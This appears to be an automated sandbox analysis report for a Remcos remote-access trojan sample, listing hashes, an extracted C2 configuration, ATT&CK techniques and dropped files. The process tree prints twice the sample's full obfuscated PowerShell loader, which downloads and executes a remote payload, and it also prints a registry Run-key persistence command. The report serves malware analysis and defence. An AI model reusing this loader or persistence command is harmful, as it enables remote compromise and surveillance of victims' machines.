remcos | 806fca5f68d315a77af1d8ac514192a59fabee15ad1d171eefcb2fd8ea6e2aa1

General

Target

806fca5f68d315a77af1d8ac514192a59fabee15ad1d171eefcb2fd8ea6e2aa1.bat
Size

4KB
MD5

7025208c5d6067587a8751c96fad91bb
SHA1

83c115ba5c3383e18ec4fc18bcd867ef25867684
SHA256

806fca5f68d315a77af1d8ac514192a59fabee15ad1d171eefcb2fd8ea6e2aa1
SHA512

ae642cd90acabbae5fe71267ca1e378090c0d38ab831314c5157ba137826d001766f69cbf379865e0089b31d12604d72e51d302215b8ab01b29d8c97ea29cc0b
SSDEEP

96:uC+ueoWu3xTKFjwSd7XphWxDI2o9vJ17RAy39Qy2l0ShxkdN:uHubp3QFM4muwy39Qy2lTuf

Score

10^/10

remcos bvas572137ele discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

Bvas572137Ele

C2

www.caravanehamburg.de:8563

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Fahfg62153EbG-7BXUPM
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	2896	powershell.exe
17	436	powershell.exe
19	436	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2896	powershell.exe
436	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Acotyledonous = "%Hemidactylus% -windowstyle 1 $Bc=(gi 'HKCU:\\Software\\Sprhagens\\').GetValue('Laramie');%Hemidactylus% ($Bc)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
436	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
436	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2896	powershell.exe
2896	powershell.exe
436	powershell.exe
436	powershell.exe
436	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	436	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4092 wrote to memory of 2896	4092	cmd.exe	84
PID 4092 wrote to memory of 2896	4092	cmd.exe	84
PID 436 wrote to memory of 3424	436	powershell.exe	93
PID 436 wrote to memory of 3424	436	powershell.exe	93
PID 436 wrote to memory of 3424	436	powershell.exe	93
PID 3424 wrote to memory of 1516	3424	cmd.exe	95
PID 3424 wrote to memory of 1516	3424	cmd.exe	95
PID 3424 wrote to memory of 1516	3424	cmd.exe	95

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\806fca5f68d315a77af1d8ac514192a59fabee15ad1d171eefcb2fd8ea6e2aa1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden "echo $Udstykningsomraaders; function Basunistens($Kalkeringers){$Eager=2;do{$Hjttaleranlggenes71+=$Kalkeringers[$Eager];$Eager+=3} until(!$Kalkeringers[$Eager])$Hjttaleranlggenes71}function Rebelly($belittlers){ .($Prparaternes) ($belittlers)}$Vandhanerne=Basunistens 'S NHoeA TV,. Dw';$Vandhanerne+=Basunistens 'L.eNeBL c Hl Li BeInNAfT';$Samilla=Basunistens 'S MAnoNoz Si.ilEdlSka ,/';$Eagermpulsfunktions=Basunistens '.lT Fl ys,v1 p2';$Xenoparasitism=' n[ GnViepyt ..C SCuE BRA VO.i Cn eSqPFro Li,iN MT vm Ra .nMeaElG DEVirSt]Do:.a: aSLaE TcB,UReRDjit TP yN.P RKuo ttL OMaCProUdlFo=Re$BeeInA eGKee r bM phaU LNeST.FS,U N TKReTSviBaOQun iS';$Samilla+=Basunistens 'Lu5An. v0Ge Bi(exW,ui InNodCao Aw FsTr eNBaT.i He1St0 C.Pr0Co;Mi ToWCliUnn 6Ap4Im;T. Ax e6Ju4Re;So Anr,ivK,:,l1K 3Mo4.m.Fr0 )Mu nG We.ocR,kAwoSk/ r2 g0P,1Ha0Sa0 C1,n0G,1 S cF Ti ar GeBofBlos,xMn/Sa1M 3.i4Te. R0';$recontemplating=Basunistens 'C uAws HeMiRSe-.saM gRiEPiNSeT';$Splejser=Basunistens ' ihA,tMot hpVe:Te/Ku/d wZowErw . .tPahSke Nv FiMesCli MoSynVeo PfL.eMen Ue nr AgT y K.c c .o RmDy/PeJ VePho UpT /BrCKihAni NgHunDooF.nNoeKvnE..A m sPoo';$Monophonies=Basunistens 'Ta>';$Prparaternes=Basunistens 'SaIFoEMoX';$officialise='Circumconic';$Christianshavneres='\Sippenipper.Sge';Rebelly (Basunistens 'T $ ,GNoL.yO SBKrA SlKo:m aSnfpnd UeH.L PI nN ,G,aSP.sWiY dG.rENeP PLFyED.Js EPerA.sAmK .E IRStN eeP 1p,6Re3Ne=E $FieTrN Iv N:N.A,iPshPZaDMaA et aAT +La$,oc ahleRPrI.is.atS iwrAStNS SSuHP,A eVMiNChe pRFie ,S');Rebelly (Basunistens 'Un$PaG lT,ODob,iaFoL D:BrrUnoA,M .ASnSJo=B $,nsBipUglPoE FjDaS ESor . s xpT.L TI t a(Sy$ omMeO.nN eoInPS.hFlO RN Vi REKos e)');Rebelly (Basunistens $Xenoparasitism);$Splejser=$Romas[0];$Byggearbejdere=(Basunistens 'Fr$U.gBrlMoo aBO aAuLCa:DerNaE uL IIW G KiSaOHuNP SStSPiTIrR UI MD IE.gKihBueGedUn=UnNC E DwCa-KhO SBGaJFiEMaC.nTU. ,sFoyS SSst ReMem,a.p,$ScV haAlnfodSkH hAFln tE ,RBrnBrE');Rebelly ($Byggearbejdere);Rebelly (Basunistens 'S,$H,RUneViltaiPyghuiMeo OnNas nsh tu r DiPodPriFzgHehAneTrd S. aH TeGaaEudBnePlr s ,[ B$ForRee UcS,o InM tS eRempupF lFuaS tS iSpn ng r]Mo=Ho$E.SSaad m,piVelPil Oa');$Afslibningen=Basunistens 'Su$ dROneHyl iFrgD iGao,gnNnsDas tForStiArdS iP gDuhDieOcddo. aDdooU,wTenDal eo la rd.nFUni Sl Fe i(Be$ TSmapFelHoe TjDesCheD rkl,Sa$JaC HoPhmEnpFoa mtAni.aeomnSitTh8An1P )';$Compatient81=$Afdelingssygeplejerskerne163;Rebelly (Basunistens 'Ka$SlgSol soSabs,a,eLFl:V G .u SDKoS Freo IR UGKaaMeaMde NboDTaeSl=Be(TrtOse ,S.ytfd-Frp VaDitHyHH, An$Dic,dO OmFePNoaF tImIF e.en fTCa8 e1Ma)');while (!$Gudsforgaaende) {Rebelly (Basunistens '.r$ yg.nlSaoG bSya lBr:hjD.ui UrVaeL,k ItToi nv.ie BrJanUdeSksDi=,a$ViDCoo jnZaeTyrskeStdP.e') ;Rebelly $Afslibningen;Rebelly (Basunistens 'udSuntReA,trPuTCu-ElSOpLSaEFaeSap B 4');Rebelly (Basunistens ' m$WiGArlenO BMoaU LUn: BG Bu.odC sR FS O aRPaGKna vAHee N D SE =,h(PoTI e es mt F-Pap FaHeT Lh.i ,$.sCk oCommepGiASpT i UERenAct S8Sc1 T)') ;Rebelly (Basunistens 'Ra$NoGDiLOvOM bDiAF,lR :Leb,oO btRihO,iJuEIl2Ti2 4 P= a$ G,olYaOAlBSya lS :Dip UOB.LAkYKeaSkdMaeT.l,oPMyHPaIEuAC + O+ D%Pu$AuRS.oBrMRhaAfsIm. FCUnoAluMyN.et') ;$Splejser=$Romas[$Bothie224]}$Hjlpemiddels223=331968;$Rucked=28368;Rebelly (Basunistens ' $BogScLSuOOvb oaSkL A: DFeARof rFLaY .DDooZiWT N ldAri L elPiY U H=Re DeGAreOvT T-DecgeO tNSttTueNanD TSu fo$NicPhOCoM,sPSiA sT eIPee,aNRoTSk8 1');Rebelly (Basunistens ' B$b,g lBooBrbOva.ol i:P sCim TaPea MkForduaEnvIsl.rsPr Fi=Ng Am[,nS nySusOvt oeBjmTi.SpCHjoF nSav eStrKotSt] a:Ac: FP.r.koC mDaB Ma rsS eSu6Sm4.iSR tusr iUdnC gEl(Po$ DIna ,fAmfS yCod oViw ,nDadafi Ll olPayL.)');Rebelly (Basunistens 'No$C GUdlFaoT b.oaW lSm:AnKTorPeAH KP nMeIYaN ngG Etsns ag=Gr N[ErsSpYH,sOvTSbE umNo.SkT,eES X Ht p.Exe eNSmCNaODeD,aiKeN gA,] C:Bi:,vA KSHyc I liSi.A G MeKatUrs.at.lr i eNC.g I( A$LiSLpmReaFoA AK ,r.vA .vDol rsJe)');Rebelly (Basunistens ' ,$X GRoLFioO,b A,il : CCV o pnBrtAurPlaNoSVatKn=Ba$TakI rF AF,kCenKoiDanSmgJaefeN.h.R sInU aBBesD tSoRn IneNStg.t( o$ nHmij.klDePGlemem eI dcyDIne.olk sE 2,f2m 3 C, l$ReR ZULyCfokfieomdCe)');Rebelly $Contrast;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Udstykningsomraaders; function Basunistens($Kalkeringers){$Eager=2;do{$Hjttaleranlggenes71+=$Kalkeringers[$Eager];$Eager+=3} until(!$Kalkeringers[$Eager])$Hjttaleranlggenes71}function Rebelly($belittlers){ .($Prparaternes) ($belittlers)}$Vandhanerne=Basunistens 'S NHoeA TV,. Dw';$Vandhanerne+=Basunistens 'L.eNeBL c Hl Li BeInNAfT';$Samilla=Basunistens 'S MAnoNoz Si.ilEdlSka ,/';$Eagermpulsfunktions=Basunistens '.lT Fl ys,v1 p2';$Xenoparasitism=' n[ GnViepyt ..C SCuE BRA VO.i Cn eSqPFro Li,iN MT vm Ra .nMeaElG DEVirSt]Do:.a: aSLaE TcB,UReRDjit TP yN.P RKuo ttL OMaCProUdlFo=Re$BeeInA eGKee r bM phaU LNeST.FS,U N TKReTSviBaOQun iS';$Samilla+=Basunistens 'Lu5An. v0Ge Bi(exW,ui InNodCao Aw FsTr eNBaT.i He1St0 C.Pr0Co;Mi ToWCliUnn 6Ap4Im;T. Ax e6Ju4Re;So Anr,ivK,:,l1K 3Mo4.m.Fr0 )Mu nG We.ocR,kAwoSk/ r2 g0P,1Ha0Sa0 C1,n0G,1 S cF Ti ar GeBofBlos,xMn/Sa1M 3.i4Te. R0';$recontemplating=Basunistens 'C uAws HeMiRSe-.saM gRiEPiNSeT';$Splejser=Basunistens ' ihA,tMot hpVe:Te/Ku/d wZowErw . .tPahSke Nv FiMesCli MoSynVeo PfL.eMen Ue nr AgT y K.c c .o RmDy/PeJ VePho UpT /BrCKihAni NgHunDooF.nNoeKvnE..A m sPoo';$Monophonies=Basunistens 'Ta>';$Prparaternes=Basunistens 'SaIFoEMoX';$officialise='Circumconic';$Christianshavneres='\Sippenipper.Sge';Rebelly (Basunistens 'T $ ,GNoL.yO SBKrA SlKo:m aSnfpnd UeH.L PI nN ,G,aSP.sWiY dG.rENeP PLFyED.Js EPerA.sAmK .E IRStN eeP 1p,6Re3Ne=E $FieTrN Iv N:N.A,iPshPZaDMaA et aAT +La$,oc ahleRPrI.is.atS iwrAStNS SSuHP,A eVMiNChe pRFie ,S');Rebelly (Basunistens 'Un$PaG lT,ODob,iaFoL D:BrrUnoA,M .ASnSJo=B $,nsBipUglPoE FjDaS ESor . s xpT.L TI t a(Sy$ omMeO.nN eoInPS.hFlO RN Vi REKos e)');Rebelly (Basunistens $Xenoparasitism);$Splejser=$Romas[0];$Byggearbejdere=(Basunistens 'Fr$U.gBrlMoo aBO aAuLCa:DerNaE uL IIW G KiSaOHuNP SStSPiTIrR UI MD IE.gKihBueGedUn=UnNC E DwCa-KhO SBGaJFiEMaC.nTU. ,sFoyS SSst ReMem,a.p,$ScV haAlnfodSkH hAFln tE ,RBrnBrE');Rebelly ($Byggearbejdere);Rebelly (Basunistens 'S,$H,RUneViltaiPyghuiMeo OnNas nsh tu r DiPodPriFzgHehAneTrd S. aH TeGaaEudBnePlr s ,[ B$ForRee UcS,o InM tS eRempupF lFuaS tS iSpn ng r]Mo=Ho$E.SSaad m,piVelPil Oa');$Afslibningen=Basunistens 'Su$ dROneHyl iFrgD iGao,gnNnsDas tForStiArdS iP gDuhDieOcddo. aDdooU,wTenDal eo la rd.nFUni Sl Fe i(Be$ TSmapFelHoe TjDesCheD rkl,Sa$JaC HoPhmEnpFoa mtAni.aeomnSitTh8An1P )';$Compatient81=$Afdelingssygeplejerskerne163;Rebelly (Basunistens 'Ka$SlgSol soSabs,a,eLFl:V G .u SDKoS Freo IR UGKaaMeaMde NboDTaeSl=Be(TrtOse ,S.ytfd-Frp VaDitHyHH, An$Dic,dO OmFePNoaF tImIF e.en fTCa8 e1Ma)');while (!$Gudsforgaaende) {Rebelly (Basunistens '.r$ yg.nlSaoG bSya lBr:hjD.ui UrVaeL,k ItToi nv.ie BrJanUdeSksDi=,a$ViDCoo jnZaeTyrskeStdP.e') ;Rebelly $Afslibningen;Rebelly (Basunistens 'udSuntReA,trPuTCu-ElSOpLSaEFaeSap B 4');Rebelly (Basunistens ' m$WiGArlenO BMoaU LUn: BG Bu.odC sR FS O aRPaGKna vAHee N D SE =,h(PoTI e es mt F-Pap FaHeT Lh.i ,$.sCk oCommepGiASpT i UERenAct S8Sc1 T)') ;Rebelly (Basunistens 'Ra$NoGDiLOvOM bDiAF,lR :Leb,oO btRihO,iJuEIl2Ti2 4 P= a$ G,olYaOAlBSya lS :Dip UOB.LAkYKeaSkdMaeT.l,oPMyHPaIEuAC + O+ D%Pu$AuRS.oBrMRhaAfsIm. FCUnoAluMyN.et') ;$Splejser=$Romas[$Bothie224]}$Hjlpemiddels223=331968;$Rucked=28368;Rebelly (Basunistens ' $BogScLSuOOvb oaSkL A: DFeARof rFLaY .DDooZiWT N ldAri L elPiY U H=Re DeGAreOvT T-DecgeO tNSttTueNanD TSu fo$NicPhOCoM,sPSiA sT eIPee,aNRoTSk8 1');Rebelly (Basunistens ' B$b,g lBooBrbOva.ol i:P sCim TaPea MkForduaEnvIsl.rsPr Fi=Ng Am[,nS nySusOvt oeBjmTi.SpCHjoF nSav eStrKotSt] a:Ac: FP.r.koC mDaB Ma rsS eSu6Sm4.iSR tusr iUdnC gEl(Po$ DIna ,fAmfS yCod oViw ,nDadafi Ll olPayL.)');Rebelly (Basunistens 'No$C GUdlFaoT b.oaW lSm:AnKTorPeAH KP nMeIYaN ngG Etsns ag=Gr N[ErsSpYH,sOvTSbE umNo.SkT,eES X Ht p.Exe eNSmCNaODeD,aiKeN gA,] C:Bi:,vA KSHyc I liSi.A G MeKatUrs.at.lr i eNC.g I( A$LiSLpmReaFoA AK ,r.vA .vDol rsJe)');Rebelly (Basunistens ' ,$X GRoLFioO,b A,il : CCV o pnBrtAurPlaNoSVatKn=Ba$TakI rF AF,kCenKoiDanSmgJaefeN.h.R sInU aBBesD tSoRn IneNStg.t( o$ nHmij.klDePGlemem eI dcyDIne.olk sE 2,f2m 3 C, l$ReR ZULyCfokfieomdCe)');Rebelly $Contrast;"
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:436
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Acotyledonous" /t REG_EXPAND_SZ /d "%Hemidactylus% -windowstyle 1 $Bc=(gi 'HKCU:\Software\Sprhagens\').GetValue('Laramie');%Hemidactylus% ($Bc)"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3424
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Acotyledonous" /t REG_EXPAND_SZ /d "%Hemidactylus% -windowstyle 1 $Bc=(gi 'HKCU:\Software\Sprhagens\').GetValue('Laramie');%Hemidactylus% ($Bc)"
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:1516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0399458c5e4eb0016d23b122bb8f5b6c

SHA1
2e1fcf547ef4c539845df16b9b9a1ea96da08bea

SHA256
bed79e2b24c22a37d83804c885039856f951f53209b88fe91b44ae8c65323b32

SHA512
e1e8a9d0d63549743b9446e46c5493f1675421b594d83d282ec339c434fdedaa817de874ee2edae4051acd05a1315897958c914975324e6a3b13536ff5380b7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_13wybjcx.ksd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Sippenipper.Sge

Filesize
469KB

MD5
bd591a627872df6cf9d82c96994abdd9

SHA1
caad35c5bdbdaba1a3f728e60a8aa28220938056

SHA256
5a86a332e61c9eaf949d28891611a6eaa4baa327b776703a559fe9cd329f8f1b

SHA512
800a478e3827babe983980e155fe630c14c191e4b214d9d7b18bcfe94ebcf65a00b9a9210cd2aeb7525848922bea036e6e33fa5f7268a93a6f526db828083304

Download Submit
memory/436-43-0x0000000006C50000-0x0000000006C6A000-memory.dmp

Filesize
104KB

Download
memory/436-71-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/436-72-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/436-44-0x00000000079F0000-0x0000000007A86000-memory.dmp

Filesize
600KB

Download
memory/436-21-0x00000000750FE000-0x00000000750FF000-memory.dmp

Filesize
4KB

Download
memory/436-22-0x0000000002DA0000-0x0000000002DD6000-memory.dmp

Filesize
216KB

Download
memory/436-23-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/436-24-0x0000000005A30000-0x0000000006058000-memory.dmp

Filesize
6.2MB

Download
memory/436-25-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/436-26-0x00000000056F0000-0x0000000005712000-memory.dmp

Filesize
136KB

Download
memory/436-28-0x00000000058B0000-0x0000000005916000-memory.dmp

Filesize
408KB

Download
memory/436-27-0x0000000005790000-0x00000000057F6000-memory.dmp

Filesize
408KB

Download
memory/436-34-0x00000000060A0000-0x00000000063F4000-memory.dmp

Filesize
3.3MB

Download
memory/436-45-0x0000000007730000-0x0000000007752000-memory.dmp

Filesize
136KB

Download
memory/436-40-0x0000000006730000-0x000000000674E000-memory.dmp

Filesize
120KB

Download
memory/436-41-0x0000000006760000-0x00000000067AC000-memory.dmp

Filesize
304KB

Download
memory/436-42-0x0000000007E70000-0x00000000084EA000-memory.dmp

Filesize
6.5MB

Download
memory/436-67-0x0000000027820000-0x0000000028A74000-memory.dmp

Filesize
18.3MB

Download
memory/436-66-0x0000000027820000-0x0000000028A74000-memory.dmp

Filesize
18.3MB

Download
memory/436-58-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/436-57-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/436-46-0x0000000008AA0000-0x0000000009044000-memory.dmp

Filesize
5.6MB

Download
memory/436-48-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/436-49-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/436-50-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/436-52-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/436-51-0x00000000750FE000-0x00000000750FF000-memory.dmp

Filesize
4KB

Download
memory/436-53-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/436-54-0x0000000009050000-0x000000000E102000-memory.dmp

Filesize
80.7MB

Download
memory/436-55-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/436-56-0x00000000750F0000-0x00000000758A0000-memory.dmp

Filesize
7.7MB

Download
memory/2896-8-0x00000202F3E20000-0x00000202F3E42000-memory.dmp

Filesize
136KB

Download
memory/2896-14-0x00007FFEA5A20000-0x00007FFEA64E1000-memory.dmp

Filesize
10.8MB

Download
memory/2896-20-0x00007FFEA5A20000-0x00007FFEA64E1000-memory.dmp

Filesize
10.8MB

Download
memory/2896-2-0x00007FFEA5A23000-0x00007FFEA5A25000-memory.dmp

Filesize
8KB

Download
memory/2896-13-0x00007FFEA5A20000-0x00007FFEA64E1000-memory.dmp

Filesize
10.8MB

Download
memory/2896-17-0x00007FFEA5A20000-0x00007FFEA64E1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads